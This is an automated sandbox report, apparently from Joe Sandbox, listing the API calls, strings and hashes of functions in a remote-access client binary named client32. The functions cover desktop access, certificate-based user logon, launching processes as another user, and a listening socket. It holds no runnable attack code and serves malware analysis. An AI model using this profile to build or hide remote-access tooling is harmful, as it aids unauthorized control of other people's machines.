Instruction Fuzzy Hash: C142B771E0462A9BDB21DF64CC91BEAB7B5EF48314F1045F8E9099B680E770AE45CF90

Function 11085430 Relevance: 66.8, APIs: 31, Strings: 7, Instructions: 296librarywindowmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110854D4
GetVersionExA.KERNEL32(?,00000000,?,00000000), ref: 110854ED
OpenWindowStationA.USER32(winsta0,00000000,00060000), ref: 1108551F
GetProcessWindowStation.USER32 ref: 1108552D
SetProcessWindowStation.USER32(00000000), ref: 1108553C
OpenDesktopA.USER32(default,00000000,00000000,00060081), ref: 11085552
SetProcessWindowStation.USER32(00000000), ref: 11085565
CloseWindowStation.USER32(00000000), ref: 1108556C
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11085590
SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 110855A5

Part of subcall function 110851E0: GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 11085218
Part of subcall function 110851E0: GetProcessHeap.KERNEL32(00000008,?), ref: 1108522A
Part of subcall function 110851E0: HeapAlloc.KERNEL32(00000000), ref: 11085231
Part of subcall function 110851E0: GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
Part of subcall function 110851E0: GetUserObjectSecurity.USER32(00000001,00000004,00000000,00000001,00000001), ref: 11085265
Part of subcall function 110851E0: GetProcessHeap.KERNEL32(00000008,00000001), ref: 11085271
Part of subcall function 110851E0: HeapAlloc.KERNEL32(00000000), ref: 11085278
Part of subcall function 110851E0: GetUserObjectSecurity.USER32(00000001,00000004,?,00000001,00000001), ref: 1108528E
Part of subcall function 110851E0: GetSecurityDescriptorDacl.ADVAPI32(110855CC,00000000,?,?), ref: 110852B0
Part of subcall function 110851E0: GetSecurityDescriptorDacl.ADVAPI32(?,00000000,?,?), ref: 110852C9

_memset.LIBCMT ref: 110855E7
LoadLibraryA.KERNEL32(userenv), ref: 11085606
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 11085618
IsBadReadPtr.KERNEL32(?,00000001), ref: 1108563B
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 1108568E
GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 110856AB
FreeLibrary.KERNEL32(00000000), ref: 110856C3
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 110856EF
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11085710
DispatchMessageA.USER32(?), ref: 1108571D
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1108572E
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 11085746
CloseHandle.KERNEL32(00000000), ref: 11085765
CloseHandle.KERNEL32 ref: 1108576A
GetProcessHeap.KERNEL32(00000000,?), ref: 11085779
HeapFree.KERNEL32(00000000), ref: 11085780
CloseDesktop.USER32(?), ref: 11085797
GetLastError.KERNEL32 ref: 110857A1
SetProcessWindowStation.USER32(?), ref: 110857BC
CloseWindowStation.USER32(?), ref: 110857CD
GetLastError.KERNEL32 ref: 110857D7

Strings

CreateEnvironmentBlock, xrefs: 11085612
Error closing desktop, e=%d, xrefs: 110857A4
userenv, xrefs: 11085601
Error closing winsta, e=%d, xrefs: 110857DA
DestroyEnvironmentBlock, xrefs: 110856A5
winsta0, xrefs: 1108551A
default, xrefs: 1108554D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$StationWindow$HeapSecurity$CloseUser$HandleObject$Message$AddressAllocDaclDescriptorDesktopErrorFreeInformationLastLibraryMultipleObjectsOpenPeekProcWait_memset$CreateDispatchLoadReadVersion
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$Error closing desktop, e=%d$Error closing winsta, e=%d$default$userenv$winsta0
API String ID: 2664440712-1106524449
Opcode ID: 677b5d0fbb0e76526f67e711a5c73b3ce293ee8ad6a0a9596ae823fe0477a226
Instruction ID: f061770eabc51647ab4d4230c3b4071e061b0d94ed79287bc5cfb6b3fcb425fe
Opcode Fuzzy Hash: 677b5d0fbb0e76526f67e711a5c73b3ce293ee8ad6a0a9596ae823fe0477a226
Instruction Fuzzy Hash: A1B18075E00329AFEB21DF658C84F9EBBB8BF45714F4081D9E919A3284DB719980CF61

Function 110A57F0 Relevance: 65.2, APIs: 22, Strings: 15, Instructions: 402libraryloaderencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 110A4AA0: LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110A5885,2F623E72,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?), ref: 110A4AE0
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110A4AFC
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110A4B09
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110A4B16
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110A4B23
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110A4B30
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110A4B3D
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110A4B4A
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110A4B57
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110A4B64
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110A4B71
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110A4B7E
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110A4B8B
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110A4B98
Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110A4BA5

GetModuleHandleA.KERNEL32(Advapi32.dll,2F623E72,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A591E
GetProcAddress.KERNEL32(00000000,CredMarshalCredentialA), ref: 110A5930
GetProcAddress.KERNEL32(?,CredFree), ref: 110A5948
GetLastError.KERNEL32(?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A599C
CryptReleaseContext.ADVAPI32(?,00000000,2F623E72,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?), ref: 110A5D41
SetLastError.KERNEL32(00000057,2F623E72,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A5D8B
FreeLibrary.KERNEL32(?,2F623E72,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A5D9C

Strings

LogonUserWithCert FAILED (%d) , xrefs: 110A5D79
CryptGetProvParam FAILED (%d), xrefs: 110A5AE3, 110A5B3A
AttemptLogon FAILED [status: 0x%08x], xrefs: 110A5CBC
CredFree, xrefs: 110A593C
LogonUserWithCert - Advapi32.dll does NOT provide required functionality!, xrefs: 110A5CE9
CertGetCertificateContextProperty (2) FAILED (%d), xrefs: 110A5BFA
LogonUserWithCert - Crypt32.dll does NOT provide required functionality!, xrefs: 110A5CFD
CertGetCertificateContextProperty (3) FAILED (%d), xrefs: 110A5C35
LogonUserWithCert - CredMarshalCredential FAILED (%d), xrefs: 110A5CDF
\\.\%s\, xrefs: 110A59B6
CertGetCertificateContextProperty (1) failed (%d), xrefs: 110A5BB3
CertAddCertificateContextToStore FAILED (%d), xrefs: 110A5B7B
CredMarshalCredentialA, xrefs: 110A5924
LogonUserWithCert - Crypt32.dll NOT found!!!, xrefs: 110A58B0
Advapi32.dll, xrefs: 110A5919

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLastLibrary$ContextCryptFreeHandleLoadModuleRelease
String ID: Advapi32.dll$AttemptLogon FAILED [status: 0x%08x]$CertAddCertificateContextToStore FAILED (%d)$CertGetCertificateContextProperty (1) failed (%d)$CertGetCertificateContextProperty (2) FAILED (%d)$CertGetCertificateContextProperty (3) FAILED (%d)$CredFree$CredMarshalCredentialA$CryptGetProvParam FAILED (%d)$LogonUserWithCert - Advapi32.dll does NOT provide required functionality!$LogonUserWithCert - CredMarshalCredential FAILED (%d)$LogonUserWithCert - Crypt32.dll NOT found!!!$LogonUserWithCert - Crypt32.dll does NOT provide required functionality!$LogonUserWithCert FAILED (%d) $\\.\%s\
API String ID: 455412317-1640292549
Opcode ID: 1073608a7586988857cd57b115a0d8d96c0e1687bdb4d56a5c9f7cdbb8116af4
Instruction ID: 14d655196b2d9980db4aac9cab0ede2ffb9987fd2d114c6750bd9b18e7e5f0cf
Opcode Fuzzy Hash: 1073608a7586988857cd57b115a0d8d96c0e1687bdb4d56a5c9f7cdbb8116af4
Instruction Fuzzy Hash: EAE162B5D0022A9FDB20DF909CC4AEEB7B8BF44358F4441E9E919A3214E7315E84CF61

Function 110851E0 Relevance: 36.2, APIs: 24, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 11085218
GetProcessHeap.KERNEL32(00000008,?), ref: 1108522A
HeapAlloc.KERNEL32(00000000), ref: 11085231
GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
GetUserObjectSecurity.USER32(00000001,00000004,00000000,00000001,00000001), ref: 11085265
GetProcessHeap.KERNEL32(00000008,00000001), ref: 11085271
HeapAlloc.KERNEL32(00000000), ref: 11085278
GetUserObjectSecurity.USER32(00000001,00000004,?,00000001,00000001), ref: 1108528E
GetSecurityDescriptorDacl.ADVAPI32(110855CC,00000000,?,?), ref: 110852B0
GetSecurityDescriptorDacl.ADVAPI32(?,00000000,?,?), ref: 110852C9
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1108533F
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 11085357
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085379
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,?), ref: 11085395
SetUserObjectSecurity.USER32(?,00000004,?), ref: 110853B5
SetUserObjectSecurity.USER32(00000001,00000004,?), ref: 110853CF
GetProcessHeap.KERNEL32(00000000,110855CC), ref: 110853E9
HeapFree.KERNEL32(00000000), ref: 110853EC
GetProcessHeap.KERNEL32(00000000,?), ref: 110853F8
HeapFree.KERNEL32(00000000), ref: 110853FB
GetProcessHeap.KERNEL32(00000000,?), ref: 11085407
HeapFree.KERNEL32(00000000), ref: 1108540A
GetProcessHeap.KERNEL32(00000000,?), ref: 11085416
HeapFree.KERNEL32(00000000), ref: 11085419

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HeapSecurity$DescriptorObjectProcessUser$DaclFree$AllocInitialize
String ID:
API String ID: 3868453208-0
Opcode ID: a825820c58583e875331af90eeb360339016fbb48d06a2a4b775561e61e6bd06
Instruction ID: 017101d2f13020300e76833adeebb0b818ce4fdc5b6587dcfb92681743389174
Opcode Fuzzy Hash: a825820c58583e875331af90eeb360339016fbb48d06a2a4b775561e61e6bd06
Instruction Fuzzy Hash: 30810BB2D04219AFEB11DBD8CC90FEFB7BCEF48714F118559E900A7244D6B5AE458BA0

Function 11061140 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 281COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1106117B

Strings

..\ctl32\Connect.cpp, xrefs: 11061450
$CLIENTNAME$, xrefs: 11061274
%03d%s, xrefs: 11061420
.prn, xrefs: 1106134E
op - obuf <= _tsizeof (obuf), xrefs: 11061455
$, xrefs: 110612B8
#, xrefs: 110612BE
$PROMPT$, xrefs: 11061180

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
API String ID: 2102423945-3087083064
Opcode ID: 39b9b20f07d8f67a96a4a039c5d39d8e0a07284d7f924ca62ab7285e05a18b76
Instruction ID: 9732641257c0b20e71b33c15b159d9766e9e212ca738346d0ff0b7fb1b6b53a2
Opcode Fuzzy Hash: 39b9b20f07d8f67a96a4a039c5d39d8e0a07284d7f924ca62ab7285e05a18b76
Instruction Fuzzy Hash: 5AA10775E002565FDB12CF64CC80BEEBBFDAF86308F1481D9D99AD7241DA31AA45CB90

Function 110CD1D0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 200networkCOMMON

Download Yara Rule

APIs

Part of subcall function 110D37D0: EnterCriticalSection.KERNEL32(111D8C5C,11017228,2F623E72,?,?,?,111B83A0,11175D28,000000FF,?,11019222), ref: 110D37D1

__CxxThrowException@8.LIBCMT ref: 110CD253

Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3

Part of subcall function 110CCED0: __CxxThrowException@8.LIBCMT ref: 110CCF42
Part of subcall function 110CCED0: getpeername.WSOCK32(?,?,00000000,2F623E72), ref: 110CCF60

Part of subcall function 11010AF0: _memmove.LIBCMT ref: 11010B2D

gethostbyname.WSOCK32(0.0.0.0,2F623E72,?,?,00000000), ref: 110CD265
WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD271
_memmove.LIBCMT ref: 110CD29B
htons.WSOCK32(00000000), ref: 110CD2C1
socket.WSOCK32(00000002,00000001,00000000), ref: 110CD2D5
WSAGetLastError.WSOCK32 ref: 110CD2E3
#21.WSOCK32(00000000,0000FFFF,00000004,?,00000004), ref: 110CD301
bind.WSOCK32(?,?,00000010), ref: 110CD311
WSAGetLastError.WSOCK32 ref: 110CD31C
listen.WSOCK32(?,7FFFFFFF,2F623E72,?,?,00000000), ref: 110CD338
WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD343
accept.WSOCK32(?,00000000,00000000,000000FF), ref: 110CD3A6
WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD3B4

Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,2F623E72,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A

Strings

Listen() the socket is not closed, xrefs: 110CD226
0.0.0.0, xrefs: 110CD260

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$DebugException@8OutputStringThrow_memmove$CriticalEnterExceptionRaiseSectionacceptbindgethostbynamegetpeernamehtonslistensocket
String ID: 0.0.0.0$Listen() the socket is not closed
API String ID: 1096978048-1307932746
Opcode ID: 000ce88f0056c492e92cabd23acb7a8945292490253a221ae30b8bcabafb762c
Instruction ID: 956b2696774708f28c41c5c40744a434557477a21071a8e5edb7c5ae032104a2
Opcode Fuzzy Hash: 000ce88f0056c492e92cabd23acb7a8945292490253a221ae30b8bcabafb762c
Instruction Fuzzy Hash: 0461A5B5E00606AFDB14DFE4C980B9EF7B5AF48B24F108659E526E72C0DB74A5018FA1

Function 110C3930 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 202windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

IsWindow.USER32(00000000), ref: 110C3A23
IsWindowVisible.USER32(00000000), ref: 110C3A32
SetForegroundWindow.USER32(00000000), ref: 110C3A4A
FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C3A7D
LoadResource.KERNEL32(00000000,00000000), ref: 110C3AA6
LockResource.KERNEL32(00000000), ref: 110C3ACA
DialogBoxIndirectParamA.USER32(00000000,00000000,00000000,Function_000C2640,111A9B6C), ref: 110C3AFB
DialogBoxParamA.USER32(00000000,?,00000000,Function_000C2640,111A9B6C), ref: 110C3B1A

Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4

Strings

pDlgTemplate || !"Unable to lock resource", xrefs: 110C3AE0
Error. NSMDialog!CreateModal has invisible parent, xrefs: 110C3A3C
hGlobal || !"Unable to load resource", xrefs: 110C3ABC
hRsrc || !"Unable to find resource", xrefs: 110C3A94
..\ctl32\nsmdlg.cpp, xrefs: 110C3946, 110C39E5, 110C3A8F, 110C3AB7, 110C3ADB
m_attached == NULL, xrefs: 110C394B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ResourceWindow$DialogExitParamProcess$ErrorFindForegroundIndirectLastLoadLockMessageVisible_strrchrwsprintf
String ID: ..\ctl32\nsmdlg.cpp$Error. NSMDialog!CreateModal has invisible parent$hGlobal || !"Unable to load resource"$hRsrc || !"Unable to find resource"$m_attached == NULL$pDlgTemplate || !"Unable to lock resource"
API String ID: 2167286109-1263985265
Opcode ID: 5be7f920ab2c731c448620dd1ebe0a91a03e1860eda6e11b0225d0bed8de44f0
Instruction ID: 3b02176d47dd3c2b148aea6defa4bedc7d0cb0a6cdad375054eba602f0083aaf
Opcode Fuzzy Hash: 5be7f920ab2c731c448620dd1ebe0a91a03e1860eda6e11b0225d0bed8de44f0
Instruction Fuzzy Hash: ED619579E0420A6BD701DFA5CC84FDFB7B8AF44758F0085A9F915AB240EA70F600CBA1

Function 11039030 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 11039116
_free.LIBCMT ref: 11039210

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

Part of subcall function 110C3E90: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C3F15
Part of subcall function 110C3E90: LoadResource.KERNEL32(00000000,00000000), ref: 110C3F44
Part of subcall function 110C3E90: LockResource.KERNEL32(00000000), ref: 110C3F68
Part of subcall function 110C3E90: CreateDialogIndirectParamA.USER32(00000000,00000000,1111EF19,110C2640,00000000), ref: 110C3F99
Part of subcall function 110C3E90: CreateDialogIndirectParamA.USER32(00000000,00000000,1111EF19,110C2640,00000000), ref: 110C3FB4
Part of subcall function 110C3E90: GetLastError.KERNEL32 ref: 110C3FD9

_calloc.LIBCMT ref: 11039225
_free.LIBCMT ref: 11039260

Strings

Get login name. Check if logged in, xrefs: 1103913E
CLTCONN.CPP, xrefs: 11039129, 11039238
GetName, xrefs: 110390A6
Not logged in!, xrefs: 11039175
Login name %s, xrefs: 110391D9
, xrefs: 110391AA
DoUserLogin, xrefs: 1103905E
u, xrefs: 11039076

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_malloc_memsetwsprintf
String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
API String ID: 2195741704-1552251038
Opcode ID: 5ae14f198104c464671bab3f216baa493da83b8bef8af5054f289781c9ff8bbe
Instruction ID: 53a8b38fcb329f41cef8c2a65a5fb3865c4ab55a76465e48db301f8623a07c24
Opcode Fuzzy Hash: 5ae14f198104c464671bab3f216baa493da83b8bef8af5054f289781c9ff8bbe
Instruction Fuzzy Hash: 1E61F475E54611AFD740EFA0DCC5FDAF3A4AF8471DF104268E9296B2C0EBB16940CB92

Function 110ED2B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 173librarywindowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,1105649A), ref: 110ED2F4

Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E

